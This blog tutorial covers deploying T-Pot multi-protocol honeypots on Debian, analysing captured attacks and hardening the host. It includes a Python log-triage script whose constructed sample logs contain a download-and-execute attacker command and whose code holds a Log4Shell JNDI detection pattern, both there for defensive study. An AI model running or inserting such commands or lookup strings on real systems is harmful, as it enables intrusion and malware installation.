Catching Hackers in the Act: Deploying T-Pot Multi-Protocol Honeypots on Linux

Security tutorial - IT technology blog

The Blind Spot in Modern Network Defense

I remember the first time I spun up a public-facing web server for a side project. Within 45 minutes, the logs were already overflowing. Hundreds of unique IP addresses from around the globe were hammering the SSH port with relentless brute-force attempts. My firewall did its job by blocking them, but I realized I was fighting a ghost. I knew that I was being targeted, but I had no idea how the attackers operated or what they wanted.

Most IT professionals operate in this state of digital blindness. We configure firewalls, WAFs, and IDS/IPS systems, feeling a sense of security when we see a “Blocked” status. This is purely reactive. You are defending against known signatures while remaining completely blind to the tools, custom payloads, or zero-day exploits being tested against your perimeter. If you can’t see what an attacker does after they “break in,” you are always playing catch-up.

The Information Asymmetry Problem

Cybersecurity is fundamentally lopsided. An attacker only needs to find one overlooked vulnerability; you have to secure every single entry point. Even worse, attackers use banner grabbing and fingerprinting to identify your exact software versions. Meanwhile, you likely know nothing about their specific methodology.

Passive logging rarely bridges this gap for three reasons:

  • Sanitized Logs: Standard services like Nginx or OpenSSH record connection attempts, but they won’t show you the full sequence of commands a hacker executes post-entry.
  • Zero Interaction: When a firewall drops a connection, the attacker simply moves to the next target. You never see their ultimate objective.
  • Signal vs. Noise: Sifting through 50,000 generic log lines to find one sophisticated exploit is a waste of human capital.

To fix this, we need to flip the script. We need a controlled environment that invites the attacker in, deceives them into thinking they’ve succeeded, and records every keystroke.

Deception Strategies: Choosing Your Bait

Not all honeypots serve the same purpose. Before choosing T-Pot, I looked at three distinct strategies for gathering intelligence.

1. Low-Interaction Honeypots

Tools like Cowrie (SSH/Telnet) or Dionaea (SMB, FTP, HTTP and other services that capture dropped malware) are lightweight. They emulate services rather than offering a full OS. While efficient, they are often easy for seasoned attackers to spot when certain complex commands fail to execute or a fingerprint does not match the advertised software.

2. High-Interaction Honeypots

These involve real systems, such as a vulnerable Windows Server VM. They yield the best data but carry massive risks. If an attacker escapes the VM, they could use your host to launch attacks on third parties, creating a legal nightmare for you.

3. The Multi-Protocol Platform (The T-Pot Approach)

T-Pot offers a middle ground. It uses Docker to run nearly 20 different honeypots—including Cowrie, Honeytrap, and Mailoney—simultaneously on one machine. It bridges the gap between low and high interaction. All the resulting data flows into a centralized ELK stack (Elasticsearch, Logstash, Kibana) for instant visualization.

The Best Approach: Deploying T-Pot on Linux

T-Pot is the fastest way to transform a standard Linux VPS into a threat intelligence hub. It automates containerization, networking, and data visualization. However, don’t underestimate the hardware requirements. Running 20+ containers alongside a resource-heavy ELK stack requires decent hardware.

Prerequisites

  • OS: Debian 11 or 12 (highly recommended).
  • RAM: 8GB is the absolute floor; 16GB is the sweet spot. With less than 8GB the kernel's OOM killer will repeatedly terminate Elasticsearch and the stack becomes unusable.
  • Disk: 128GB SSD. Logs and indices grow by several gigabytes per day in high-traffic environments.
  • Network: A public IP with no external firewall blocking the honeypot ports. We want the attackers to have a clear path to our traps; only the management ports (SSH and the web UI, covered under hardening below) should ever be restricted.

Step 1: System Preparation

Start with a clean Debian installation. Because T-Pot takes over almost every available port, you need to be careful with your initial setup. Run the standard updates first:

sudo apt update && sudo apt upgrade -y
sudo apt install git -y

Step 2: Cloning and Installing T-Pot

The installation process is almost entirely automated. Clone the official repository and jump into the installer directory:

git clone https://github.com/telekom-security/tpotce
cd tpotce/iso/installer/

Execute the installer script. You will be asked to select an installation type. Choose “Standard.” This includes the full suite of honeypots and the ELK dashboard.

sudo ./install.sh --type=standard

Note that the repository layout, the installer location and its flags have changed between T-Pot releases (newer releases run install.sh from the repository root and ask for the edition interactively), so check the README of the release you cloned before running anything.

Step 3: Configuration and Security

The installer will prompt you for a web interface username and password. Do not reuse a common password here. Your honeypot will be under constant siege. If your management UI is weak, you’ve just given a hacker a free server.

I suggest using a 32-character random string. You can generate one locally (a password manager or your OS's random-number tooling) or use a tool like toolcraft.app. Ensure it includes symbols and varied casing, and store it in a password manager, not in a shell history or a note on the server.

Warning on SSH: T-Pot moves your real management SSH service to port 64295. The standard port 22 is handed over to Cowrie to trap attackers. Keep your current session open until you have confirmed a second login on the new port works; if you get disconnected, reconnect using: ssh -p 64295 user@your-ip.

Step 4: Accessing the Dashboard

After the reboot, wait about 15 minutes for the Docker containers to pull and initialize. Access your dashboard at:

https://[your-ip]:64297

The Kibana interface is where the magic happens. You’ll find real-time heatmaps and deep-dive analysis tools. There is also a built-in CyberChef instance to help you decode any obfuscated payloads (base64 blobs, URL-encoded shell one-liners) you find in the logs.

Analyzing the “Catch”

Leave the system running for 24 hours. When you return to Kibana, the sheer volume of automated malice is usually a shock. On a typical day, a single T-Pot instance might record 30,000 to 50,000 events.

  1. Mass Scanners: You will see constant pings from Shodan, Censys, and various botnets indexing your “vulnerabilities.”
  2. Brute Force: You can watch live as attackers try common credentials like admin/admin or root/123456 on your emulated SSH and RDP ports.
  3. Exploit Payloads: Tools like Dionaea will capture binary malware. T-Pot records the cryptographic hashes of these files. You can drop a hash into VirusTotal to see exactly what kind of ransomware or botnet agent they were trying to install. Search by hash rather than uploading the sample itself, and never run a captured binary outside an isolated analysis VM.

This data is actionable. If you notice a sudden spike in attempts against port 6379 (Redis) or specific Log4j strings, you know exactly what to patch on your production servers before the wave hits them.
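The triage the two passages above describe (top credentials, what an attacker ran after a successful login, the hashes of dropped files, a spike on a port such as 6379, and Log4j lookup strings) can be scripted instead of read off the dashboard. The script below is an added example, not T-Pot's own code. It uses the field names Cowrie writes to its JSON log (eventid, timestamp, src_ip, session, username, password, input, url, shasum); the log lines, the per-hour connection list and the spike threshold are constructed for the example and are assumptions, not captures from a real instance.

```python
"""Triage of T-Pot honeypot output (added example, not T-Pot's own code).

Cowrie writes one JSON object per line. The sample lines and the connection
list below are constructed for this example, not real captures.
"""
import json
import re
import statistics
from collections import Counter, defaultdict

# Constructed Cowrie events: two brute-forcers, one successful login that
# fetches a payload, and one truncated line so triage is shown surviving bad input.
SAMPLE_COWRIE = """\
{"eventid":"cowrie.login.failed","timestamp":"2024-05-01T06:12:01Z","src_ip":"203.0.113.5","session":"a1","username":"admin","password":"admin"}
{"eventid":"cowrie.login.failed","timestamp":"2024-05-01T06:12:03Z","src_ip":"203.0.113.5","session":"a1","username":"root","password":"123456"}
{"eventid":"cowrie.login.failed","timestamp":"2024-05-01T06:15:40Z","src_ip":"198.51.100.9","session":"b2","username":"admin","password":"admin"}
{"eventid":"cowrie.login.success","timestamp":"2024-05-01T06:20:11Z","src_ip":"192.0.2.44","session":"c3","username":"root","password":"123456"}
{"eventid":"cowrie.command.input","timestamp":"2024-05-01T06:20:12Z","src_ip":"192.0.2.44","session":"c3","input":"uname -a"}
{"eventid":"cowrie.command.input","timestamp":"2024-05-01T06:20:13Z","src_ip":"192.0.2.44","session":"c3","input":"cd /tmp; wget http://192.0.2.99/x86 -O .x; chmod +x .x; ./.x"}
{"eventid":"cowrie.session.file_download","timestamp":"2024-05-01T06:20:15Z","src_ip":"192.0.2.44","session":"c3","url":"http://192.0.2.99/x86","shasum":"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"}
{"eventid":"cowrie.login.failed","timestamp":"2024-05-01T06:21
"""

# Constructed (timestamp, destination port) pairs: a 2/hour Redis baseline,
# a 40-hit burst at 06:00, and steady SSH noise that must not be flagged.
SAMPLE_CONNS = (
    [(f"2024-05-01T{h:02d}:{m:02d}:00Z", 6379) for h in range(6) for m in (5, 35)]
    + [(f"2024-05-01T06:{m:02d}:00Z", 6379) for m in range(40)]
    + [(f"2024-05-01T{h:02d}:15:00Z", 22) for h in range(7)]
)


def parse_cowrie(text):
    """Parse JSON-lines output; a truncated line is skipped, not fatal."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def top_credentials(events, n=5):
    """Most-tried (username, password) pairs across failed and successful logins."""
    pairs = Counter(
        (e.get("username", ""), e.get("password", ""))
        for e in events if e.get("eventid", "").startswith("cowrie.login.")
    )
    return pairs.most_common(n)


def session_commands(events):
    """Commands typed per session, in order: the post-entry sequence sshd never logs."""
    cmds = defaultdict(list)
    for e in events:
        if e.get("eventid") == "cowrie.command.input":
            cmds[e["session"]].append(e["input"])
    return dict(cmds)


def downloads(events):
    """(sha256, url) of files the attacker pulled in; the hash is what you look up."""
    return [(e["shasum"], e["url"]) for e in events
            if e.get("eventid") == "cowrie.session.file_download"]


def spike_hours(conns, port, factor=3.0, min_count=10):
    """Hours whose hit count on `port` exceeds factor x the hourly median (heuristic)."""
    counts = Counter(ts[:13] for ts, p in conns if p == port)  # key: YYYY-MM-DDTHH
    if len(counts) < 2:
        return []
    median = statistics.median(counts.values())
    return sorted(h for h, c in counts.items() if c >= min_count and c > factor * median)


_OBF = re.compile(r"\$\{(?:lower|upper):(.)\}|\$\{::-(.)\}", re.IGNORECASE)


def has_jndi(payload):
    """Detect a Log4Shell-style ${jndi:...} lookup, collapsing ${lower:j} / ${::-j} obfuscation first."""
    prev, s = None, payload
    while prev != s:  # repeat until no single-character lookups remain
        prev = s
        s = _OBF.sub(lambda m: m.group(1) or m.group(2), s)
    return "${jndi:" in s.lower()


def triage(text):
    events = parse_cowrie(text)
    by_session = session_commands(events)
    return {
        "events": len(events),
        "top_credentials": top_credentials(events, 3),
        "sessions_with_commands": len(by_session),
        "download_hashes": [h for h, _ in downloads(events)],
        "jndi_in_commands": [c for cmds in by_session.values() for c in cmds if has_jndi(c)],
    }


if __name__ == "__main__":
    for k, v in triage(SAMPLE_COWRIE).items():
        print(f"{k}: {v}")
    print("redis spike hours:", spike_hours(SAMPLE_CONNS, 6379))
```

The spike detector compares each hour against the median of all hours rather than a fixed count, so a port that is always noisy (22) is not flagged while a quiet port that suddenly gets forty hits (6379) is; tune `factor` and `min_count` to your own baseline. On a live instance, point `parse_cowrie` at the Cowrie JSON log T-Pot stores under its data directory and feed `spike_hours` the destination-port field from whichever honeypot you are watching.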

Hardening the Host OS

While the honeypots are meant to be messy, the host must stay locked down. I recommend two specific maintenance tasks:

  1. Automated Updates: T-Pot ships an update script (under /opt/tpot in older releases; check the README for the path in yours). Run it on a schedule to keep the containers fresh, and keep the host's own packages patched with the distribution's unattended upgrades, since the host kernel and Docker are what stand between the honeypots and the rest of your network.
  2. IP Whitelisting: Use your cloud provider’s security groups to restrict ports 64295 (SSH) and 64297 (Web UI) to your specific office or home IP. There is no reason for the rest of the world to see your management ports; every other port stays open, because that is the bait.

Deploying a honeypot shifts your mindset from guessing to knowing. It transforms security from a chore into an active defense strategy. Instead of just blocking traffic, you are now gathering the intelligence needed to make your entire network truly resilient.
